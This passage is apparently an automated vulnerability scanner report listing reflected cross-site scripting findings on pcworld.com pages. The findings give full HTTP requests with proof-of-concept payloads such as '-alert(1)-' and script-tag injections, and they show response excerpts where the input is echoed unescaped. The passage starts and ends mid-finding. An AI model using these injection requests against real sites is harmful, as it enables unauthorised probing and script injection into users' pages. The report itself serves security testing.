erEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/index/security.html6bde1'-alert(1)-'ce8c4f271bd';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri=" + e
...[SNIP]...

1.62. http://www.pcworld.com/businesscenter/index/security/viruses_phishing_spam.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pcworld.com
Path:   /businesscenter/index/security/viruses_phishing_spam.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50827"><a>9ffa37c2904 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /businesscenter/index/security50827"><a>9ffa37c2904/viruses_phishing_spam.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:40:33 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:40:32 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
<img style="display:none" width="1" height="1" src="http://pixel.pcworld.com/pixel.gif?ad=pcw.bc/index;pg=index;c=1730;pos=336showcase;tile=2;sz=336x280;
&amp;url=/businesscenter/index/security50827"><a>9ffa37c2904/viruses_phishing_spam.html"/>
...[SNIP]...

1.63. http://www.pcworld.com/businesscenter/index/security/viruses_phishing_spam.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /businesscenter/index/security/viruses_phishing_spam.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60071'-alert(1)-'e043a719796 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /businesscenter/index/security60071'-alert(1)-'e043a719796/viruses_phishing_spam.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:40:53 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:40:52 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
on.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/index/security60071'-alert(1)-'e043a719796/viruses_phishing_spam.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.c
...[SNIP]...

1.64. http://www.pcworld.com/businesscenter/index/security/viruses_phishing_spam.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pcworld.com
Path:   /businesscenter/index/security/viruses_phishing_spam.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49f47"><a>0c5ac57f090 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /businesscenter/index/security/viruses_phishing_spam.html49f47"><a>0c5ac57f090 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=23D6B93E082BEDB0434D8CB7DA78301B; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:41:37 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
none" width="1" height="1" src="http://pixel.pcworld.com/pixel.gif?ad=pcw.bc/index;pg=index;c=1730;pos=336showcase;tile=2;sz=336x280;
&amp;url=/businesscenter/index/security/viruses_phishing_spam.html49f47"><a>0c5ac57f090"/>
...[SNIP]...

1.65. http://www.pcworld.com/businesscenter/index/security/viruses_phishing_spam.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /businesscenter/index/security/viruses_phishing_spam.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8ba0'-alert(1)-'f7e1151c2f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /businesscenter/index/security/viruses_phishing_spam.htmld8ba0'-alert(1)-'f7e1151c2f HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E80BB6AA0F0E6C464BA8546FE20DFD87; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:42:55 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
ie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/index/security/viruses_phishing_spam.htmld8ba0'-alert(1)-'f7e1151c2f';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri=" + e
...[SNIP]...

1.66. http://www.pcworld.com/businesscenter/index/servers_storage.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /businesscenter/index/servers_storage.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25fc6"><script>alert(1)</script>1ad70c5c4d5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /businesscenter/index/servers_storage.html25fc6"><script>alert(1)</script>1ad70c5c4d5 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=DA35799E49E5803DDC07806B48EFAEC9; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:39:08 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
style="display:none" width="1" height="1" src="http://pixel.pcworld.com/pixel.gif?ad=pcw.bc/index;pg=index;c=1730;pos=336showcase;tile=2;sz=336x280;
&amp;url=/businesscenter/index/servers_storage.html25fc6"><script>alert(1)</script>1ad70c5c4d5"/>
...[SNIP]...

1.67. http://www.pcworld.com/businesscenter/index/servers_storage.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /businesscenter/index/servers_storage.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4755b'-alert(1)-'23b13dc335 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /businesscenter/index/servers_storage.html4755b'-alert(1)-'23b13dc335 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:39:45 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
= pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/index/servers_storage.html4755b'-alert(1)-'23b13dc335';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri=" + e
...[SNIP]...

1.68. http://www.pcworld.com/businesscenter/index/servers_storage/servers.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /businesscenter/index/servers_storage/servers.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0cbc'-alert(1)-'4db9b3ccac8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /businesscenter/index/servers_storagee0cbc'-alert(1)-'4db9b3ccac8/servers.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:40:53 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=E8616940AC69F1295E07009B52A79533; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:40:52 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
Email = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/index/servers_storagee0cbc'-alert(1)-'4db9b3ccac8/servers.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.l
...[SNIP]...

1.69. http://www.pcworld.com/businesscenter/index/servers_storage/servers.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pcworld.com
Path:   /businesscenter/index/servers_storage/servers.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d4bc"><a>9a31e8d991b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /businesscenter/index/servers_storage7d4bc"><a>9a31e8d991b/servers.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:40:14 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=B8B2B60C18785766E242EBDB11B9DADA; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:40:13 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
<img style="display:none" width="1" height="1" src="http://pixel.pcworld.com/pixel.gif?ad=pcw.bc/index;pg=index;c=1730;pos=336showcase;tile=2;sz=336x280;
&amp;url=/businesscenter/index/servers_storage7d4bc"><a>9a31e8d991b/servers.html"/>
...[SNIP]...

1.70. http://www.pcworld.com/businesscenter/index/servers_storage/servers.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /businesscenter/index/servers_storage/servers.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dfb6d'-alert(1)-'b7f486c0673 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /businesscenter/index/servers_storage/servers.htmldfb6d'-alert(1)-'b7f486c0673 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C57F62B3D94B58686D3F5E1E5DDDA4F2; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:42:50 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
eadCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/index/servers_storage/servers.htmldfb6d'-alert(1)-'b7f486c0673';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri=" + e
...[SNIP]...

1.71. http://www.pcworld.com/businesscenter/index/servers_storage/servers.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pcworld.com
Path:   /businesscenter/index/servers_storage/servers.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6169e"><a>f03916e9453 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /businesscenter/index/servers_storage/servers.html6169e"><a>f03916e9453 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:41:38 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
isplay:none" width="1" height="1" src="http://pixel.pcworld.com/pixel.gif?ad=pcw.bc/index;pg=index;c=1730;pos=336showcase;tile=2;sz=336x280;
&amp;url=/businesscenter/index/servers_storage/servers.html6169e"><a>f03916e9453"/>
...[SNIP]...

1.72. http://www.pcworld.com/businesscenter/index/software_services.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /businesscenter/index/software_services.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79e52"><script>alert(1)</script>69525ac23ea was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /businesscenter/index/software_services.html79e52"><script>alert(1)</script>69525ac23ea HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:45:49 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
yle="display:none" width="1" height="1" src="http://pixel.pcworld.com/pixel.gif?ad=pcw.bc/index;pg=index;c=1730;pos=336showcase;tile=2;sz=336x280;
&amp;url=/businesscenter/index/software_services.html79e52"><script>alert(1)</script>69525ac23ea"/>
...[SNIP]...

1.73. http://www.pcworld.com/businesscenter/index/software_services.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /businesscenter/index/software_services.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c7a9'-alert(1)-'f2865b9c1a4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /businesscenter/index/software_services.html9c7a9'-alert(1)-'f2865b9c1a4 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D101BB4429A9D7FDD22B93443BD12646; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:45:54 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/index/software_services.html9c7a9'-alert(1)-'f2865b9c1a4';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri=" + e
...[SNIP]...

1.74. http://www.pcworld.com/businesscenter/index/software_services/productivity.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /businesscenter/index/software_services/productivity.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33b3d'-alert(1)-'27aaef33dab was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /businesscenter/index/software_services33b3d'-alert(1)-'27aaef33dab/productivity.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:45:07 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:45:06 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
ail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/index/software_services33b3d'-alert(1)-'27aaef33dab/productivity.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "
...[SNIP]...

1.75. http://www.pcworld.com/businesscenter/index/software_services/productivity.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pcworld.com
Path:   /businesscenter/index/software_services/productivity.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab248"><a>ee150f52351 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /businesscenter/index/software_servicesab248"><a>ee150f52351/productivity.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:44:53 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=60ECAD47FFAD3FA27B70469BCF48201B; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:44:53 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
mg style="display:none" width="1" height="1" src="http://pixel.pcworld.com/pixel.gif?ad=pcw.bc/index;pg=index;c=1730;pos=336showcase;tile=2;sz=336x280;
&amp;url=/businesscenter/index/software_servicesab248"><a>ee150f52351/productivity.html"/>
...[SNIP]...

1.76. http://www.pcworld.com/businesscenter/index/software_services/productivity.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pcworld.com
Path:   /businesscenter/index/software_services/productivity.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59799"><a>ffe7be870e9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /businesscenter/index/software_services/productivity.html59799"><a>ffe7be870e9 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=459D110779AC2D7929705AA4E42D8A76; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:45:07 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
none" width="1" height="1" src="http://pixel.pcworld.com/pixel.gif?ad=pcw.bc/index;pg=index;c=1730;pos=336showcase;tile=2;sz=336x280;
&amp;url=/businesscenter/index/software_services/productivity.html59799"><a>ffe7be870e9"/>
...[SNIP]...

1.77. http://www.pcworld.com/businesscenter/index/software_services/productivity.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /businesscenter/index/software_services/productivity.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 163f6'-alert(1)-'691e9d237e8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /businesscenter/index/software_services/productivity.html163f6'-alert(1)-'691e9d237e8 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C18240BF47B5DA38EBC8F53F380D6C16; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:45:22 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
ie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/index/software_services/productivity.html163f6'-alert(1)-'691e9d237e8';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri=" + e
...[SNIP]...

1.78. http://www.pcworld.com/howto.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /howto.html

Issue detail

